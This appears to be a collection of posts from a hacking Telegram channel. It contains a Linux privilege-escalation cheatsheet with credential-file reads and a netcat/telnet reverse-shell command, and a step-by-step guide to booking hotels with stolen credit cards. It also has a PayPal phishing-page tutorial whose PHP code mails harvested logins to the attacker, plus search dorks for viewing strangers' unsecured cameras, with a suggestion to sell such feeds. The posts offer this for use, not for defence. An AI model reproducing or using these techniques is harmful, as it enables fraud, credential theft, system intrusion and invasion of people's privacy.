Premium private

Tutorial is out Check guyz :) https://youtu.be/FWgPk_ZWMxI

𝙏𝙝𝙚 𝙇𝙞𝙣𝙪𝙭 𝙋𝙧𝙞𝙫𝙞𝙡𝙚𝙜𝙚 𝙀𝙨𝙘𝙖𝙡𝙖𝙩𝙞𝙤𝙣 𝘾𝙝𝙚𝙖𝙩𝙨𝙝𝙚𝙚𝙩 Operating System What's the distribution type? What version? cat /etc/issue cat /etc/*-release cat /etc/lsb-release What's the kernel version? Is it 64-bit? cat /proc/version uname -a uname -mrs rpm -q kernel dmesg | grep Linux ls /boot | grep vmlinuz- What can be learnt from the environmental variables? cat /etc/profile cat /etc/bashrc cat ~/.bash_profile cat ~/.bashrc cat ~/.bash_logout env set Is there a printer? lpstat -a Applications & Services What services are running? Which service has which user privilege? ps aux ps -ef top cat /etc/services Which service(s) are been running by root? Of these services, which are vulnerable ps aux | grep root ps -ef | grep root What applications are installed? What version are they? Are they currently running? ls -alh /usr/bin/ ls -alh /sbin/ dpkg -l rpm -qa ls -alh /var/cache/apt/archivesO ls -alh /var/cache/yum/ Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached? cat /etc/syslog.conf cat /etc/chttp.conf cat /etc/lighttpd.conf cat /etc/cups/cupsd.conf cat /etc/inetd.conf cat /etc/apache2/apache2.conf cat /etc/my.conf cat /etc/httpd/conf/httpd.conf cat /opt/lampp/etc/httpd.conf ls -aRl /etc/ | awk '$1 ~ /^.*r.*/ What jobs are scheduled? crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root Any plain text usernames and/or passwords? grep -i user [filename] grep -i pass [filename] grep -C 5 "password" [filename] find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla Communications & Networking What NIC(s) does the system have? Is it connected to another network? /sbin/ifconfig -a cat /etc/network/interfaces cat /etc/sysconfig/network What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway? cat /etc/resolv.conf cat /etc/sysconfig/network cat /etc/networks iptables -L hostname dnsdomainname What other users & hosts are communicating with the system? lsof -i lsof -i :80 grep 80 /etc/services netstat -antup netstat -antpx netstat -tulpn chkconfig --list chkconfig --list | grep 3:on last w Whats cached? IP and/or MAC addresses arp -e route /sbin/route -nee Is packet sniffing possible? What can be seen? Listen to live traffic tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21 Note: tcpdump tcp dst [ip] [port] and tcp dst [ip] [port] Have you got a shell? Can you interact with the system? nc -lvp 4444 # Attacker. Input (Commands) nc -lvp 4445 # Attacker. Ouput (Results) telnet [attackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP! Confidential Information & Users Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what? id who w last cat /etc/passwd | cut -d: -f1 # List of users grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users awk -F: '($3 == "0") {print}' /etc/passwd # List of super users cat /etc/sudoers sudo -l What sensitive files can be found? cat /etc/passwd cat /etc/group cat /etc/shadow ls -alh /var/mail/ Anything "interesting" in the home directorie(s)? If it's possible to access ls -ahlR /root/ ls -ahlR /home/ Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords cat /var/apache2/config.inc cat /var/lib/mysql/mysql/user.MYD cat /root/anaconda-ks.cfg What has the user being doing? Is there any password in plain text? What have they been edting? cat ~/.bash_history cat ~/.nano_history cat ~/.atftp_history cat ~/.mysql_history cat ~/.php_history What user information can be found? cat ~/.bashrc cat ~/.profile cat /var/mail/root cat /var/spool/mail/root 𝗼𝘀𝘁 𝗖𝗿𝗲𝗱𝗶𝘁𝘀 @Aarish_xy 𝗖𝗵𝗮𝗻𝗻𝗲𝗹 𝗖𝗿𝗲𝗱𝘂𝘁𝘀 @PREMlUM_HACKS

😃 Hi Guyz ! 😃 🇮🇳😎 Newbie Here !! 😎🇮🇳 ⚜️ Today I'm here with some of the best books 📚📚 related to Hacking 🏴‍☠️ and these are for Beginners in this field. 🏴‍☠️ 🔰 So Let's Start ⭕️ Name of Books :— https://telegra.ph/Names-of-Books-07-06 🔗 Link to Download :— https://bit.ly/2SQs7Hx ✍️ By :— @its_newbie 🇮🇳 💠 D.M for Hacking/Tricks/Mods Type of Post in your channel. #newbie 😡🤬LEACHERS COPY CREDIT 😈😈

HOTEL CARDING✅ ✓A Non VBV CC required ✓Use hotels.com or booking.com ✓New email with cc holders name ✓Socks of the cc holder city Steps; ✅The First thing you will do is to get your cc ready to process the hotel booking online. I will advise that you go for non-refundable rooms. ✅Your cc should be of high balance to cover the hotel fees. ✅Make an email with the cc holder name and get ready to start the process. ✅Visit https://www.booking.com and make a new account with the cc holders detail. Now, proceed to login and browse available rooms for the country/city you want to book a hotel in. ✅Allow your account to age before checking out. ✅Go to Booking.com and select the hotel type you want. ✅Now , After choosing hotel room go for the non-refundable rooms and checkout. ✅After filling in your Guest name and details go to next page, that’s the payment page and look for something like pay now and fill that column. ✅If you didn’t find that Pay now column then choose another hotel till you get ✅Put in cc details and make payment. ✅Now the site will say thank you and reservation is paid. ✅You’ll get the booking receipt via email. 𝗣𝗼𝘀𝘁 𝗖𝗿𝗲𝗱𝗶𝘁𝘀 @Aarish_xy 𝗖𝗵𝗮𝗻𝗻𝗲𝗹 𝗖𝗿𝗲𝗱𝘂𝘁𝘀 @PREMlUM_HACKS

⚜️ Hi Guyz !! ⚜️ 🔰 Again with some of Intresting Books & Courses 🔰 ♻️ 1. Building Virtual Pentesting Labs for Advanced Penetration Testing 🔗 Link :— https://drive.google.com/file/d/0By8giYopjXKPS19leTRRUnZ6cTQ/view?resourcekey=0-evopKltLSBVPuW1gUK1b9Q ♻️ 2. Web Penetration Testing with Kali Linux 🔗 Link :— https://drive.google.com/file/d/1TVa_DiiAUvn-iTS7YyXRAbO6x9xutY56/view ♻️ 3. Metasploit Penetration Testing Cookbook 🔗 Link:— https://drive.google.com/file/d/0B1vbHLhgkjB8blJhZXEtOTZvcHc/view?resourcekey=0-nqrxQHm8YB6-YqgtWdjAzA ♻️ 4. CEH v10 EC-Council Certified Ethical Hacker 🔗 Link :— https://drive.google.com/file/d/13WLJPVcbP-1jHEjAaGsJCvPrQxoXn3ea/view ♻️ 5. Black Hat Python Python Programming for Hackers and Pentesters 🔗 Link :—https://drive.google.com/file/d/0B8l--C_9AhJeUkVmNERLODd3X28/view?resourcekey=0-u2J4qNuyJvsZANpAg7m_1A ✍️ By :— @its_newbie 🇮🇳 💠 D.M for Hacking/Tricks/Mods Type of Post in your channel. #newbie 😡🤬LEACHERS COPY CREDIT 😒😏

🍎🍎🇦‌🇹‌🇹‌🇪‌🇳‌🇹‌🇮‌🇴‌🇳‌🍎🍎 ✳️𝐀𝐬 𝐢 𝐬𝐚𝐢𝐝 𝐢 𝐰𝐢𝐥𝐥 𝐛𝐞 𝐛𝐚𝐜𝐤 𝐰𝐢𝐭𝐡 𝐬𝐨𝐦𝐞𝐭𝐡𝐢𝐧𝐠 𝐛𝐢𝐠 !! 𝐋𝐚𝐮𝐧𝐜𝐡𝐢𝐧𝐠 𝐨𝐮𝐫 𝐧𝐞𝐰 𝐜𝐨𝐦𝐦𝐮𝐧𝐢𝐭𝐲 𝐨𝐧 𝟏𝟓𝐚𝐮𝐠 , 𝐢𝐟 𝐲𝐨𝐮 𝐰𝐚𝐧𝐭 𝐭𝐨 𝐛𝐞 𝐚 𝐩𝐚𝐫𝐭 𝐨𝐟 𝐢𝐭 𝐩𝐫𝐞𝐩𝐚𝐫𝐞 𝐚𝐧𝐲 𝐨𝐧𝐞 𝐨𝐟 𝐭𝐡𝐞 𝐬𝐤𝐢𝐥𝐥 𝐩𝐞𝐫𝐟𝐞𝐜𝐭𝐥𝐲 𝐚𝐧𝐝 𝐪𝐮𝐚𝐥𝐢𝐟𝐲 𝐨𝐮𝐫 𝐞𝐱𝐚𝐦✳️ 👨‍💻Skills Required 🍊Web Pentester 🍊Data Analyst 🍊Python Expert 🍊Java Expert 🍊Android Pentester 🍊C & C++ Expert 🍊Bughunter 🍊Security Analyst 🍊Nmap Expert 🍊Exploit Developer 🍊System Administrator 🍊Network Analyst 🍊Osint Expert 🍊Social Engineer 🍊Web Developer 🍊Web Pentester 🍊Crypto Analyst 🍊Blockchain Developer 🍊Weapon Designer 🍊Professional Graphic Designer 🍊Metasploit Expert 🍊Burpsuite Expert 🍍Here is the course for your basic guide , take more help from google and YouTube.🍍 https://mega.nz/folder/HwgwgRDT#g1ddvJvuuOMUocHi2-MXQA 🔉ᴇxᴀᴍ ᴡɪʟʟ ʙᴇ ᴏɴ 𝟷𝟻ᴀᴜɢ 🔉At 10am!! ⚠️Test will be held on channel and groups under CIDHUB⚠️ 👨‍💻𝙊𝙧𝙜𝙖𝙣𝙞𝙨𝙚𝙙 𝘽𝙮=@CIDHUB

HOW TO MAKE SCAMPAGE TUTORIAL(2021) ✓Scam page is a fake webpage. e.g. a login of a popular website, online bank login and etc. depending on what it is. scam page are used by spammers to collect data on people who get scammed. detecting scam page is simple if you are technology oriented. but most common users can't detect scam page. this is a big problem in the www. some company are developing software to combat scam's or phishing scams - phishing is the term used for this scam. Steps; ✓OK, so first we choose a target. We chose www.paypal.com ✓ Navigate the site chosen. Press CTRL + S and save the file. Html somewhere on yourcomputer. ✓We open ... There might be a problem, namely the way the image. ✓ If relative path (relative path is the path like / images / wow.gif) be transformed into an absolute path (http://tinta.com/images/wow.gif) ✓Now that you clarified your lead you to the file. Html that was saved, so your login type CTRL + F ... (Here the words are different .. try and password, password, username, etc.. Dak login does not work). ✓ You have a code like <form action="login2.php">. Login2.php change in 040147.php! ✓ Now, the username should be a code like . name = "email" tells us that in PHP script authentication is the variable that you email username. ✓Good memory. The password, the code should be similar ( ). So, password is held in variable password. A and memorize it. ✓Now, where you have saved. Html, created a new file called 040147.php. In it, add the following code: Code: $ To = "[email protected]" $ Name = $ _POST ['email']; $ Email = $ _POST ['email']; $ Subject = $ _POST ['subject']; $ Password = $ _POST ['password']; $ Agent = $ _SERVER ['HTTP_USER_AGENT']; $ Ip = $ _SERVER ['REMOTE_ADDR']; $ D = date ('l dS \ of F Y h: i: s A'); $ Sub = "New Account Hacked PayPal - $ email"; $ Headers = "From: $ name <$ email> \ n"; $ Headers .= "Content-Type: text / plain, charset = iso-8859-1 \ n"; $ Mes .= 'Username:'. $ Email. "\ N"; $ Msg .= "Password:". $ Password. "\ N"; $ Msg .= "Browser:". $ Agent. "\ N"; $ Msg .= "IP:". $ Ip. "\ N"; $ Mes .= 'Date and time:'. $ D; ( mail ($ to, $ sub, $ mes, $ headers); header ("Location: www.paypal.com");      ) ?> ✓ Modify code Code: $ To = "[email protected]" and put your mail. The code above variables over email and password and sends them together with some more useful details. ✓Rename. Or HTML into index.html. Php, you upload the 2 files on a host and entertain. : Wink: 𝗣𝗼𝘀𝘁 𝗖𝗿𝗲𝗱𝗶𝘁𝘀 @Aarish_xy 𝗖𝗵𝗮𝗻𝗻𝗲𝗹 𝗖𝗿𝗲𝗱𝘂𝘁𝘀 @PREMlUM_HACKS

🔥 HACK INTO RANDOM PEOPLE'S CAMERAS IN MINUTES! 🔥 Just for the sake of education only , dont misuse it. 1. Go on google. 2. Write one or a combination of two of these Strings: inurl:/views.shtml inurl:ViewerFrame?Mode= inurl:ViewerFrame?Mode=Refresh inurl:axis-cgi/jpg inurl:view/views.shtml liveapplet intitle:"live view" intitle:axis intitle:liveapplet intitle:axis intitle:"video server" intitle:"EvoCam" inurl:"webcam.html" inurl:indexFrame-shtml Axis intitle:start inurl:cgistart intitle:snc-z20 inurl:home/ intitle:snc-cs3 inurl:home/ intitle:snc-rz30 inurl:home/ viewnetcam.com intitle"Toshiba Network Camera" user login intitle"i-Catcher Console - Web Monitor" 3. Search for a result which looks "weird" (without any information under the main title and/or with an IP address as a main title) 4. That's it. If you find something interesting you could potentially sell the link for a quick buck (maybe you find a bedroom camera, who knows you ━━━━━━━━━━━━━━━━━━━━━━━━ 𝗣𝗼𝘀𝘁 𝗖𝗿𝗲𝗱𝗶𝘁𝘀 @Aarish_xy 𝗖𝗵𝗮𝗻𝗻𝗲𝗹 𝗖𝗿𝗲𝗱𝘂𝘁𝘀 @PREMlUM_HACKS